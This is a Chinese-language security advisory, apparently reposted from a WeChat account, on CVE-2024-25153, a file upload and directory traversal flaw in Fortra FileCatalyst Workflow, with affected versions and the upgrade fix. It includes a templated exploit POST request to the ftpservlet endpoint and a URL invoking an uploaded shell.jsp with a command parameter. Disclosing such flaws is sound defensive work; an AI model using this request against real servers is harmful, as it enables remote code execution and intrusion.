漏洞描述:
FortraFileCatalyst是一个企业文件传输管理(MFT)解决方案,由FileCatalyst Direct、Workflow 和 Central等多个组件组成,FileCatalyst Workflow包括一个web门户,允许用户与其组织内的任何人共享、修改和跟踪文件,近日监测到Fortra FileCatalyst Workflow中修复了一个目录遍历漏洞(CVE-2024-25153),其CVSS评分为9.8,目前该漏洞的细节及PoC已公开。
FileCatalyst Workflow 版本5.1.6 Build 114之前在/workflow/servlet/ftpservlet中存在不安全的文件上传和目录遍历漏洞,可通过特制POST请求将恶意文件上传到限定的uploadtemp目录之外的位置,从而导致远程代码执行。
POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1
Host: {url}
Content-Type: application/octet-stream
Cookie: JSESSIONID={SESSION}
X-File-Type: image/png
X-File-Name: upload.png
{file contents}
https://{url}/workflow/uploadtemp/{session_id}/{file_name}
https://{url}/workflow/nettitude/shell.jsp?cmd=whoami
https://{url}:12480/servlet/ftpservlet
影响范围:
Fortra FileCatalyst Workflow 5.x < 5.1.6 Build 114
安全措施:
升级版本
目前该漏洞已经修复,受影响用户可升级到Fortra FileCatalyst Workflow 5.1.6 Build 114或更高版本
下载链接:
https://filecatalyst.software/workflow.html
临时措施:
暂无
原文始发于微信公众号(飓风网络安全):【漏洞预警】Fortra FileCatalyst Workflow远程代码执行漏洞(CVE-2024-25153)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论